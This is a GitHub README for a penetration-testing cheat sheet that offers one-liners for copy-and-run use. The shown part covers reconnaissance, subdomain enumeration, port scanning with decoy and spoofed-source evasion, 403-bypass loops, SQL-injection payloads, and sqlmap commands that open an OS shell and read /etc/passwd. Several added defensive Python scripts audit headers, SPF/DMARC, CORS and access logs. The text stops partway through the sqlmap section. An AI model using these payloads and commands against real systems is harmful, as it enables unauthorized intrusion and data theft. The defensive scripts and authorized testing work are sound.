PentesterTN/CopyHack
GitHub: PentesterTN/CopyHack
A cheat sheet of 500+ commonly used penetration-testing one-liners, covering 27 attack scenarios, made for quick copy-and-run use.
500+ penetration-testing one-liners for every hacking scenario
Stop googling. Start hacking.
Recon • SQLi • XSS • LFI • RCE • SSRF • PrivEsc • AD • Cloud • Containers • Shells • Cracking
## How to use
You're on a penetration test. You have a shell. You need a command. **Right now**.
1. Find your section below
2. Copy the command
3. Replace `TARGET`, `LHOST`, `LPORT` with your values
4. Run it
Or search from the terminal:
```
curl -s https://raw.githubusercontent.com/PentesterTN/CopyHack/main/README.md | grep -A2 "your_keyword"
```
## Table of Contents
| # | Section | Commands |
|---|---------|----------|
| 01 | [Reconnaissance](#01-reconnaissance) | 60+ |
| 02 | [Subdomain Enumeration](#02-subdomain-enumeration) | 30+ |
| 03 | [Port Scanning](#03-port-scanning) | 25+ |
| 04 | [Web Fingerprinting](#04-web-fingerprinting) | 30+ |
| 05 | [Directory & File Discovery](#05-directory--file-discovery) | 30+ |
| 06 | [SQL Injection](#06-sql-injection) | 50+ |
| 07 | [Cross-Site Scripting (XSS)](#07-cross-site-scripting-xss) | 50+ |
| 08 | [Local/Remote File Inclusion](#08-localremote-file-inclusion) | 40+ |
| 09 | [Command Injection](#09-command-injection) | 30+ |
| 10 | [SSRF](#10-ssrf) | 30+ |
| 11 | [Authentication Bypass](#11-authentication-bypass) | 30+ |
| 12 | [IDOR & Access Control](#12-idor--access-control) | 25+ |
| 13 | [API Testing](#13-api-testing) | 40+ |
| 14 | [Reverse Shells](#14-reverse-shells) | 50+ |
| 15 | [File Transfer](#15-file-transfer) | 30+ |
| 16 | [Linux Privilege Escalation](#16-linux-privilege-escalation) | 80+ |
| 17 | [Windows Privilege Escalation](#17-windows-privilege-escalation) | 70+ |
| 18 | [Active Directory](#18-active-directory) | 60+ |
| 19 | [Lateral Movement & Pivoting](#19-lateral-movement--pivoting) | 40+ |
| 20 | [Cloud (AWS/GCP/Azure)](#20-cloud-awsgcpazure) | 50+ |
| 21 | [Container Escape (Docker/K8s)](#21-container-escape-dockerk8s) | 35+ |
| 22 | [Password Cracking](#22-password-cracking) | 30+ |
| 23 | [Persistence & Backdoors](#23-persistence--backdoors) | 30+ |
| 24 | [Data Exfiltration](#24-data-exfiltration) | 25+ |
| 25 | [Defense Evasion](#25-defense-evasion) | 30+ |
| 26 | [Wireless Attacks](#26-wireless-attacks) | 25+ |
| 27 | [OSINT](#27-osint) | 30+ |
## 01. Reconnaissance
### DNS
```
# All DNS records
dig TARGET ANY +noall +answer
# Zone transfer attempt
dig axfr @NS_SERVER TARGET
# Reverse DNS lookup on a range
for ip in $(seq 1 254); do host 10.10.10.$ip; done | grep -v "not found"
# DNS brute force with wordlist
for sub in $(cat /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt); do dig +short $sub.TARGET | grep -v "^$" && echo "$sub.TARGET"; done
# Get all DNS records with multiple types
for type in A AAAA CNAME MX NS TXT SOA SRV; do echo "=== $type ===" && dig $type TARGET +short; done
# DNSSEC check
dig TARGET +dnssec +short
# Find nameservers and query each one's version.bind (CHAOS TXT) banner
dig NS TARGET +short | while read ns; do dig @$ns version.bind chaos txt +short 2>/dev/null && echo " -> $ns"; done
# DNS cache snooping
dig @NS_SERVER TARGET A +norecurse
# Reverse DNS brute force for a /24
for i in $(seq 1 254); do host TARGET_NETWORK.$i | grep "name pointer" | cut -d' ' -f5; done
# PTR record lookup
dig -x IP_ADDRESS +short
```
### Whois & ASN
```
# Whois lookup
whois TARGET
# ASN lookup
whois -h whois.radb.net -- "-i origin AS_NUMBER" | grep -Eo "([0-9.]+){4}/[0-9]+"
# Find all IPs belonging to an organization
curl -s "https://api.bgpview.io/search?query_term=TARGET_ORG" | jq '.data.asns[].asn'
# Reverse whois by email
curl -s "https://viewdns.info/reversewhois/?q=TARGET_EMAIL" | grep -oP '[a-z0-9.-]+\.[a-z]{2,}'
# CIDR ranges for an ASN (deduplicated)
whois -h whois.radb.net -- "-i origin AS_NUMBER" | grep -Eo "([0-9.]+){4}/[0-9]+" | sort -u
```
### Technology Detection
```
# HTTP headers fingerprinting
curl -sI https://TARGET | grep -iE "server|x-powered|x-asp|x-generator|x-drupal|x-framework"
# Check for common tech indicators
curl -s https://TARGET | grep -ioE "(wp-content|drupal|joomla|laravel|django|angular|react|vue|next|nuxt|rails|spring|express)"
# Wappalyzer-style from CLI
whatweb https://TARGET
# SSL/TLS certificate details
echo | openssl s_client -connect TARGET:443 2>/dev/null | openssl x509 -noout -text | grep -E "Subject:|Issuer:|DNS:"
# Check HTTP methods allowed
curl -sI -X OPTIONS https://TARGET | grep "Allow:"
# Extract JavaScript framework versions
curl -s https://TARGET | grep -oP '(react|angular|vue|jquery|bootstrap)[\w.-]*\.js' | sort -u
# Identify WAF
wafw00f https://TARGET
# Check security headers
curl -sI https://TARGET | grep -iE "strict-transport|content-security|x-frame|x-content-type|x-xss|referrer-policy|permissions-policy"
```
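The two `curl -sI ... | grep` one-liners above only tell you whether a header name appears. The following added example (written for this page, not code from the CopyHack repository) parses a raw response header block such as `curl -sI` prints and turns it into a short audit: which hardening headers are absent, which present ones carry a weak value (an HSTS `max-age` under a year, a non-standard `X-Frame-Options`), and which headers disclose the stack. The response it runs against is constructed for the example.

```python
"""Audit the security-relevant response headers of an HTTP response.

Added example (not from the CopyHack repository). It parses a raw HTTP
response header block such as `curl -sI` prints and reports the headers the
one-liners above grep for: missing hardening headers, weak values, and
fingerprinting headers that disclose the stack. SAMPLE_RESPONSE is constructed.
"""
import re

# Headers whose absence weakens the browser-side posture (defender's checklist).
REQUIRED_HEADERS = (
    "strict-transport-security",
    "content-security-policy",
    "x-frame-options",
    "x-content-type-options",
    "referrer-policy",
    "permissions-policy",
)

# Headers that typically leak server or framework details.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator", "x-drupal-cache")


def parse_headers(raw: str) -> dict:
    """Parse a raw header block into a dict keyed by lower-cased header name."""
    headers = {}
    for line in raw.splitlines():
        if ":" not in line:
            continue  # status line or blank line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def audit_security_headers(raw: str) -> dict:
    """Return findings: missing hardening headers, weak values, and disclosures."""
    headers = parse_headers(raw)
    findings = {"missing": [], "weak": [], "disclosure": []}

    for name in REQUIRED_HEADERS:
        if name not in headers:
            findings["missing"].append(name)

    hsts = headers.get("strict-transport-security")
    if hsts:
        m = re.search(r"max-age=(\d+)", hsts, re.I)
        # A max-age below one year (31536000 s) is generally considered too short.
        if not m or int(m.group(1)) < 31536000:
            findings["weak"].append("strict-transport-security: max-age below one year")

    xfo = headers.get("x-frame-options", "").upper()
    if xfo and xfo not in ("DENY", "SAMEORIGIN"):
        findings["weak"].append(f"x-frame-options: unsupported value {xfo!r}")

    xcto = headers.get("x-content-type-options", "").lower()
    if xcto and xcto != "nosniff":
        findings["weak"].append(f"x-content-type-options: expected nosniff, got {xcto!r}")

    for name in DISCLOSURE_HEADERS:
        if headers.get(name):
            findings["disclosure"].append(f"{name}: {headers[name]}")

    return findings


# Constructed sample response for a self-contained, offline run.
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/7.4.3
Strict-Transport-Security: max-age=86400
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=UTF-8
"""

if __name__ == "__main__":
    for category, items in audit_security_headers(SAMPLE_RESPONSE).items():
        print(f"{category}: {items}")
```

To run it against a live host, feed it the output of `curl -sI https://TARGET` on stdin; the parser ignores the status line and only keys on `Name: value` pairs, so the same function works for HTTP/1.1 and HTTP/2 responses.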
### Email & Users
```
# Email harvesting with theHarvester
theHarvester -d TARGET -b all -l 500
# Extract emails from a website
curl -s https://TARGET | grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
# LinkedIn employee enumeration (passive)
curl -s "https://www.google.com/search?q=site:linkedin.com+%22TARGET%22+employees" | grep -oP 'linkedin\.com/in/[^"&]+'
# Hunter.io email finder
curl -s "https://api.hunter.io/v2/domain-search?domain=TARGET&api_key=API_KEY" | jq '.data.emails[].value'
# Check if email exists (SMTP VRFY)
echo "VRFY user@TARGET" | nc -w3 MAIL_SERVER 25
# SMTP user enumeration
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t MAIL_SERVER
# Check for email spoofing (SPF/DMARC)
dig TXT TARGET | grep "v=spf"
dig TXT _dmarc.TARGET | grep "v=DMARC"
# Google dork for emails
# site:TARGET filetype:pdf | filetype:doc | filetype:xls
```
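The two `dig TXT` checks above show whether SPF and DMARC records exist, but the spoofing exposure depends on their values: the SPF `all` qualifier and the DMARC `p=` policy. The added example below (written for this page, not code from the CopyHack repository) takes the TXT record strings those `dig` commands return and summarises the posture; it does no DNS lookups itself, and the records it evaluates are constructed.

```python
"""Evaluate a domain's SPF and DMARC records for sender-spoofing exposure.

Added example, not from the CopyHack repository. It takes the TXT record
strings that `dig TXT TARGET +short` and `dig TXT _dmarc.TARGET +short`
return, so it runs offline; the records below are constructed for the example.
"""
import re


def _clean(record: str) -> str:
    # dig wraps TXT records in quotes and splits long ones into "a" "b" chunks.
    return record.strip().replace('" "', "").strip('"')


def parse_spf(txt_records):
    """Return the SPF 'all' qualifier (+, -, ~, ?) or None if no SPF record exists."""
    records = [_clean(r) for r in txt_records]
    spf = [r for r in records if r.lower().startswith("v=spf1")]
    if not spf:
        return None
    # SPF terms are space separated; the 'all' mechanism is normally last.
    for term in spf[0].split()[1:]:
        m = re.fullmatch(r"([+\-~?]?)all", term, re.I)
        if m:
            return m.group(1) or "+"  # no qualifier means PASS (+)
    return "?"  # no 'all' term: neutral result by default


def parse_dmarc(txt_records):
    """Return the DMARC policy (none/quarantine/reject) or None if absent."""
    for r in (_clean(r) for r in txt_records):
        if r.lower().startswith("v=dmarc1"):
            tags = {}
            for tag in r.split(";"):
                if "=" in tag:
                    k, _, v = tag.partition("=")
                    tags[k.strip().lower()] = v.strip()
            return tags.get("p", "none").lower()
    return None


def spoofing_posture(spf_txt, dmarc_txt) -> dict:
    """Summarise exposure to sender spoofing from the two record sets."""
    qualifier = parse_spf(spf_txt)
    policy = parse_dmarc(dmarc_txt)
    issues = []
    if qualifier is None:
        issues.append("no SPF record")
    elif qualifier in ("+", "?"):
        issues.append(f"SPF '{qualifier}all' does not reject unauthorized senders")
    elif qualifier == "~":
        issues.append("SPF softfail (~all): relies on receiver policy")
    if policy is None:
        issues.append("no DMARC record")
    elif policy == "none":
        issues.append("DMARC p=none: monitoring only, spoofed mail is still delivered")
    return {"spf_all": qualifier, "dmarc_policy": policy, "issues": issues}


# Constructed records for an offline run (example.com / example.net are reserved names).
SPF_WEAK = ['"v=spf1 include:_spf.example.net ~all"']
DMARC_NONE = ['"v=DMARC1; p=none; rua=mailto:dmarc@example.com"']
SPF_STRICT = ['"v=spf1 ip4:192.0.2.0/24 -all"']
DMARC_REJECT = ['"v=DMARC1; p=reject; pct=100"']

if __name__ == "__main__":
    print(spoofing_posture(SPF_WEAK, DMARC_NONE))
    print(spoofing_posture(SPF_STRICT, DMARC_REJECT))
```

A `~all` plus `p=none` combination is the common "looks configured, still spoofable" case: receivers see a softfail and a monitoring-only policy, so the message is typically delivered.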
### Google Dorking
```
# Find login pages
# site:TARGET inurl:login | inurl:admin | inurl:signin
# Find sensitive files
# site:TARGET filetype:sql | filetype:env | filetype:log | filetype:bak
# Find exposed directories
# site:TARGET intitle:"index of" | intitle:"directory listing"
# Find subdomains via Google
# site:*.TARGET -www
# Find config files
# site:TARGET ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
# Find database dumps
# site:TARGET ext:sql | ext:dbf | ext:mdb
# Find exposed Git repos
# site:TARGET inurl:".git"
# Find WordPress specific
# site:TARGET inurl:wp-content | inurl:wp-includes
# Find API keys in JS
# site:TARGET ext:js "api_key" | "apikey" | "api-key"
# Find error pages with stack traces
# site:TARGET "Fatal error" | "Stack trace" | "Traceback" | "Internal Server Error"
```
### Shodan
```
# Basic host search
shodan host TARGET_IP
# Search by organization
shodan search "org:TARGET_ORG"
# Find specific services
shodan search "hostname:TARGET port:8080"
# Find default creds pages
shodan search "http.title:dashboard hostname:TARGET"
# Export results
shodan search "org:TARGET_ORG" --fields ip_str,port,org,hostnames --limit 1000
# Find exposed databases
shodan search "port:27017 org:TARGET_ORG" # MongoDB
shodan search "port:6379 org:TARGET_ORG" # Redis
shodan search "port:9200 org:TARGET_ORG" # Elasticsearch
# Find webcams
shodan search "Server: yawcam org:TARGET_ORG"
```
## 02. Subdomain Enumeration
```
# Subfinder
subfinder -d TARGET -all -silent
# Amass passive
amass enum -passive -d TARGET
# Assetfinder
assetfinder --subs-only TARGET
# Certificate transparency logs
curl -s "https://crt.sh/?q=%25.TARGET&output=json" | jq -r '.[].name_value' | sort -u
# SecurityTrails
curl -s "https://api.securitytrails.com/v1/domain/TARGET/subdomains" -H "APIKEY: KEY" | jq -r '.subdomains[]' | sed "s/$/.TARGET/"
# Brute force with DNS resolving
cat /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | while read sub; do
  ip=$(dig +short $sub.TARGET | head -1)
  [ -n "$ip" ] && echo "$sub.TARGET -> $ip"
done
# Combine multiple tools
(subfinder -d TARGET -silent; amass enum -passive -d TARGET 2>/dev/null; assetfinder --subs-only TARGET) | sort -u
# Check which subdomains are alive
cat subdomains.txt | httpx -silent -status-code -title
# Find subdomains from JavaScript files
cat urls.txt | grep "\.js$" | xargs -I{} curl -s {} | grep -oP '[a-zA-Z0-9_-]+\.TARGET' | sort -u
# Wayback machine subdomain discovery
curl -s "http://web.archive.org/cdx/search/cdx?url=*.TARGET/*&output=json&fl=original" | jq -r '.[1:][] | .[0]' | sed 's|https\?://||' | cut -d'/' -f1 | sort -u
# Recursive subdomain enumeration
subfinder -d TARGET -silent | while read sub; do subfinder -d $sub -silent; done | sort -u
# Find virtual hosts
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://TARGET_IP -H "Host: FUZZ.TARGET" -fs SIZE_TO_FILTER
# GitHub subdomains
curl -s "https://api.github.com/search/code?q=%22TARGET%22&per_page=100" | grep -oP '[a-z0-9_.-]+\.TARGET' | sort -u
# Rapid7 FDNS dataset (if downloaded)
zcat fdns_any.json.gz | grep "TARGET" | jq -r '.name' | sort -u
# DNSRecon
dnsrecon -d TARGET -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
# Gobuster DNS mode
gobuster dns -d TARGET -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50
# Check for subdomain takeover
subjack -w subdomains.txt -t 100 -timeout 30 -ssl -a
# DNSSEC walking
nsec3walker TARGET
# Find subdomains in SPF records
dig TXT TARGET +short | grep -oP 'include:([^\s]+)' | while read inc; do echo $inc; dig TXT $(echo $inc | cut -d: -f2) +short; done
```
## 03. Port Scanning
```
# Fast full port scan
nmap -p- --min-rate=1000 -T4 TARGET -oN ports.txt
# Service version detection on found ports
nmap -sV -sC -p PORTS TARGET -oN services.txt
# UDP top ports
nmap -sU --top-ports 50 TARGET
# Masscan full port scan (fastest)
masscan -p1-65535 TARGET --rate=1000 -oL masscan.txt
# Rustscan (fast + nmap integration)
rustscan -a TARGET -- -sV -sC
# Scan through proxy/SOCKS
proxychains nmap -sT -Pn -p 80,443,8080 TARGET
# Scan for specific vulnerabilities
nmap --script vuln TARGET
# OS detection
nmap -O TARGET
# Scan entire subnet
nmap -sn 10.10.10.0/24 -oG alive.txt && grep "Up" alive.txt | cut -d' ' -f2
# Aggressive scan
nmap -A -T4 TARGET
# Firewall evasion techniques
nmap -f -D RND:5 -S SPOOF_IP TARGET # Fragment + decoy
nmap --source-port 53 TARGET # Source port 53 (DNS)
nmap -sN TARGET # NULL scan
nmap -sF TARGET # FIN scan
nmap -sX TARGET # Xmas scan
# Banner grabbing
echo "" | nc -nv TARGET PORT 2>&1 | head -5
# Quick banner grab on multiple ports
for port in 21 22 25 80 110 143 443 445 3306 3389 8080; do
  echo -n "Port $port: " && echo "" | nc -w2 -nv TARGET $port 2>&1 | head -1
done
# Scan for SMB
nmap -p 139,445 --script smb-vuln* TARGET
# Check for EternalBlue
nmap -p 445 --script smb-vuln-ms17-010 TARGET
# Network sweep with ping
fping -a -g 10.10.10.0/24 2>/dev/null
# ARP scan (local network)
arp-scan -l
# Netcat port scan
for port in $(seq 1 1000); do (echo >/dev/tcp/TARGET/$port) 2>/dev/null && echo "Port $port open"; done
```
## 04. Web Fingerprinting
```
# Full header analysis
curl -sILk https://TARGET
# Extract all links from a page
curl -s https://TARGET | grep -oP 'href="[^"]+"' | cut -d'"' -f2 | sort -u
# Find JavaScript files
curl -s https://TARGET | grep -oP 'src="[^"]*\.js"' | cut -d'"' -f2 | sort -u
# Extract API endpoints from JavaScript
curl -s https://TARGET/main.js | grep -oP '"/(api|v[0-9])/[^"]*"' | sort -u
# Check robots.txt
curl -s https://TARGET/robots.txt
# Check sitemap.xml
curl -s https://TARGET/sitemap.xml | grep -oP 'https?://[^<]+'
# Extract HTML comments from a page (extraction had stripped the pattern; grep -P matches per line)
curl -s https://TARGET | grep -oP '<!--.*?-->'
# Check for source maps
curl -s https://TARGET | grep -oP 'src="([^"]*\.js)"' | cut -d'"' -f2 | while read js; do
  code=$(curl -sk -o /dev/null -w "%{http_code}" "https://TARGET${js}.map")
  [ "$code" = "200" ] && echo "SOURCE MAP: ${js}.map"
done
# WordPress detection & enumeration
wpscan --url https://TARGET -e ap,at,u
# Extract emails from page
curl -s https://TARGET | grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-z]{2,}'
# Find hidden form fields
curl -s https://TARGET | grep -oP '<input[^>]*type="hidden"[^>]*>'
# Check for CORS misconfiguration
curl -sI -H "Origin: https://evil.com" https://TARGET | grep -i "access-control"
# Detect framework from cookies
curl -sI https://TARGET | grep -i "set-cookie" | grep -ioE "(PHPSESSID|JSESSIONID|ASP.NET_SessionId|connect.sid|laravel_session|_rails|csrftoken|wp-settings)"
# Check for clickjacking
curl -sI https://TARGET | grep -i "x-frame-options"
# Extract metadata from PDF/docs
exiftool document.pdf
# Crawl and extract URLs
katana -u https://TARGET -d 3 -silent
# GAU (Get All URLs from archives)
gau TARGET --subs | sort -u
# Wayback URLs
waybackurls TARGET | sort -u
# Extract parameters from URLs
cat urls.txt | grep "?" | cut -d'?' -f2 | tr '&' '\n' | cut -d'=' -f1 | sort -u
# Find sensitive files
for file in .env .git/HEAD .svn/entries .DS_Store .htaccess wp-config.php.bak config.php.bak web.config database.yml .npmrc .dockerenv Dockerfile docker-compose.yml; do
  code=$(curl -sk -o /dev/null -w "%{http_code}" "https://TARGET/$file")
  [ "$code" = "200" ] && echo "FOUND: $file"
done
```
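The CORS check above greps for any `access-control` header after sending a foreign `Origin`. Whether the result matters depends on the combination of values, which the added example below (written for this page, not code from the CopyHack repository) classifies: a reflected arbitrary origin is only serious together with `Access-Control-Allow-Credentials: true`, a wildcard with credentials is rejected by browsers, and a `null` origin allowance is reachable from sandboxed content. The header sets it evaluates are constructed; `evil.example` stands in for whatever probe origin was sent.

```python
"""Classify CORS response headers for common misconfigurations.

Added example, not from the CopyHack repository. `sent_origin` is the Origin
value the probe request carried (assumed to be an arbitrary, non-allow-listed
origin, as in the curl one-liner above); `headers` is a dict of the response
headers. RESPONSES below is constructed sample data.
"""


def assess_cors(sent_origin: str, headers: dict) -> tuple:
    """Return (severity, reason) for the CORS headers a response carries."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"

    if acao is None:
        return ("info", "no Access-Control-Allow-Origin header: cross-origin reads are blocked")
    if acao == "*":
        if creds:
            # Browsers refuse credentialed responses when ACAO is '*', so this fails closed.
            return ("low", "wildcard origin with credentials is rejected by browsers; still a misconfiguration")
        return ("medium", "wildcard origin: any site can read unauthenticated responses")
    if acao == sent_origin:
        if creds:
            return ("high", "arbitrary origin reflected with credentials: authenticated data readable cross-origin")
        return ("medium", "arbitrary origin reflected without credentials")
    if acao == "null":
        # 'null' is the Origin of sandboxed iframes and data: URLs, so allowing it is not a real allow-list.
        return ("high" if creds else "medium", "'null' origin allowed: reachable from sandboxed iframes and data: URLs")
    return ("info", f"fixed allow-list origin {acao!r}")


# Constructed responses to a probe that sent "Origin: https://evil.example".
PROBE_ORIGIN = "https://evil.example"
RESPONSES = {
    "reflected": {"Access-Control-Allow-Origin": "https://evil.example", "Access-Control-Allow-Credentials": "true"},
    "wildcard": {"Access-Control-Allow-Origin": "*"},
    "fixed": {"Access-Control-Allow-Origin": "https://app.example.com", "Vary": "Origin"},
    "none": {"Content-Type": "text/html"},
}

if __name__ == "__main__":
    for name, hdrs in RESPONSES.items():
        print(name, assess_cors(PROBE_ORIGIN, hdrs))
```

When an origin is reflected, repeat the probe with a second, unrelated origin before concluding it is arbitrary reflection rather than a coincidental allow-list entry; `Vary: Origin` on a fixed value is the sign of a deliberate allow-list.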
## 05. Directory & File Discovery
```
# Feroxbuster (recursive, fast)
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,html,txt,bak -t 50
# Gobuster
gobuster dir -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt -t 50
# FFuf
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -mc 200,301,302,403 -t 50
# Dirsearch
dirsearch -u https://TARGET -e php,asp,aspx,html,txt,bak
# Find backup files
for ext in bak old orig save swp swo tmp ~; do
  ffuf -u https://TARGET/FUZZ.$ext -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200 -s
done
# API endpoint discovery
ffuf -u https://TARGET/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,401,403
# Find hidden parameters
arjun -u https://TARGET/page
# Recursive gobuster
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirb/common.txt -r -t 50 --wildcard
# IIS specific
gobuster dir -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt -x asp,aspx,config
# WordPress specific
gobuster dir -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt
# Find config files
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -mc 200
# Virtual host discovery
ffuf -u http://TARGET -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.TARGET" -fs SIZE
# 403 Bypass techniques
for path in "/ENDPOINT" "/ENDPOINT/" "/ENDPOINT/." "/./ENDPOINT/./" "//ENDPOINT//" "/ENDPOINT%20" "/ENDPOINT%09" "/ENDPOINT..;/" "/ENDPOINT;/" "/ENDPOINT.json"; do
  code=$(curl -sk -o /dev/null -w "%{http_code}" "https://TARGET$path")
  echo "$code $path"
done
# 403 Bypass with headers
for header in "X-Original-URL: /ENDPOINT" "X-Rewrite-URL: /ENDPOINT" "X-Forwarded-For: 127.0.0.1" "X-Custom-IP-Authorization: 127.0.0.1" "X-Real-IP: 127.0.0.1"; do
  code=$(curl -sk -o /dev/null -w "%{http_code}" -H "$header" "https://TARGET/ENDPOINT")
  echo "$code $header"
done
# HTTP method fuzzing
for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do
  code=$(curl -sk -o /dev/null -w "%{http_code}" -X $method "https://TARGET/ENDPOINT")
  echo "$code $method"
done
# Find .git exposed and dump it
git-dumper https://TARGET/.git/ output_dir
# Nuclei scanning
nuclei -u https://TARGET -t /usr/share/nuclei-templates/ -severity critical,high
```
## 06. SQL Injection
### Detection
```
# Basic error-based test
curl -s "https://TARGET/page?id=1'" | grep -iE "sql|syntax|mysql|ora-|postgresql|sqlite|microsoft|warning"
# Boolean-based detection
# TRUE: https://TARGET/page?id=1 AND 1=1
# FALSE: https://TARGET/page?id=1 AND 1=2
# Compare response sizes:
curl -s "https://TARGET/page?id=1 AND 1=1" | wc -c
curl -s "https://TARGET/page?id=1 AND 1=2" | wc -c
# Time-based detection
time curl -s "https://TARGET/page?id=1; WAITFOR DELAY '0:0:5'--" # MSSQL
time curl -s "https://TARGET/page?id=1' AND SLEEP(5)--" # MySQL
time curl -s "https://TARGET/page?id=1'; SELECT pg_sleep(5)--" # PostgreSQL
# UNION-based column count
for i in $(seq 1 20); do
  cols=$(python3 -c "print(','.join(['NULL']*$i))")
  code=$(curl -sk -o /dev/null -w "%{http_code}" "https://TARGET/page?id=1' UNION SELECT $cols--")
  echo "Columns $i: HTTP $code"
done
# URL-encoded payloads
curl -s "https://TARGET/page?id=1%27%20OR%201%3D1--%20"
# Double URL encoding
curl -s "https://TARGET/page?id=1%2527%2520OR%25201%253D1--%2520"
# JSON body SQLi
curl -s -X POST https://TARGET/api/login -H "Content-Type: application/json" -d '{"user":"admin'\'' OR 1=1--","pass":"x"}'
# Header-based SQLi
curl -s https://TARGET -H "X-Forwarded-For: 1' OR 1=1--"
curl -s https://TARGET -H "User-Agent: 1' OR 1=1--"
curl -s https://TARGET -H "Referer: 1' OR 1=1--"
curl -s https://TARGET -b "cookie=1' OR 1=1--"
```
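Every probe in the detection block above leaves a characteristic trace in the web server's access log, and the URL-encoded and double-encoded variants are the ones a naive grep misses. The added example below (written for this page, not code from the CopyHack repository) is the defender's counterpart: it parses combined-format log lines, URL-decodes the query string repeatedly until it stops changing, and reports which of the probe families (boolean pairs, time delays, UNION column probing, comment terminators, stacked queries) each request matches. The log lines are constructed for the example.

```python
"""Flag SQL-injection probe patterns in web access-log lines.

Added example, not from the CopyHack repository. The signatures mirror the
detection tests above so a defender can see what those requests look like on
the server side. Query strings are URL-decoded repeatedly before matching so
that single and double encoding do not hide the payload. SAMPLE_LOG is
constructed (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
"""
import re
from urllib.parse import unquote, urlsplit

SQLI_SIGNATURES = {
    "boolean": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "time-based": re.compile(r"\b(?:sleep\s*\(|pg_sleep\s*\(|waitfor\s+delay)", re.I),
    "union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "comment-terminator": re.compile(r"(?:--|#|/\*)\s*$"),
    "stacked": re.compile(r";\s*(?:exec|select|drop|insert|update|copy)\b", re.I),
}

# Combined log format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Apply URL decoding until the value stops changing (handles double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str):
    """Return (ip, path, [matched signature names]) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("path")).query
    decoded = fully_decode(query)
    hits = [name for name, rx in SQLI_SIGNATURES.items() if rx.search(decoded)]
    return m.group("ip"), m.group("path"), hits


def scan_log(lines):
    """Return only the parsed lines that matched at least one signature."""
    results = []
    for line in lines:
        parsed = scan_line(line)
        if parsed and parsed[2]:
            results.append(parsed)
    return results


# Constructed access-log lines: one benign request, the probes from the block above, one false-positive candidate.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /page?id=1%27%20AND%201%3D1-- HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /page?id=1%27%20AND%20SLEEP(5)-- HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /page?id=1%2527%2520OR%25201%253D1--%2520 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /page?id=1%27%20UNION%20SELECT%20NULL,NULL,NULL-- HTTP/1.1" 500 0',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=andrea HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(hits)}")
```

The `andrea` request shows why the boolean signature requires a number after `and`/`or`: matching the bare keywords would flood the output with ordinary search terms. POST bodies (the JSON login probe above) are not in the access log at all, so that case needs application-level or WAF logging rather than this scanner.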
### Exploitation with SQLmap
```
# Basic sqlmap
sqlmap -u "https://TARGET/page?id=1" --batch --dbs
# POST request
sqlmap -u "https://TARGET/login" --data="user=admin&pass=test" --batch --dbs
# With cookies
sqlmap -u "https://TARGET/page?id=1" --cookie="session=ABC123" --batch --dbs
# Specific parameter
sqlmap -u "https://TARGET/page?id=1&name=test" -p id --batch --dbs
# Through proxy
sqlmap -u "https://TARGET/page?id=1" --proxy="http://127.0.0.1:8080" --batch --dbs
# Dump specific table
sqlmap -u "https://TARGET/page?id=1" -D database -T users --dump --batch
# OS shell
sqlmap -u "https://TARGET/page?id=1" --os-shell --batch
# File read
sqlmap -u "https://TARGET/page?id=1" --file-read="/etc/passwd" --batch
# Tamper scripts for WAF bypass
sqlmap -u "https://TARGET/page?id=1" --tamper=space2comment,between,randomcase --batch --dbs
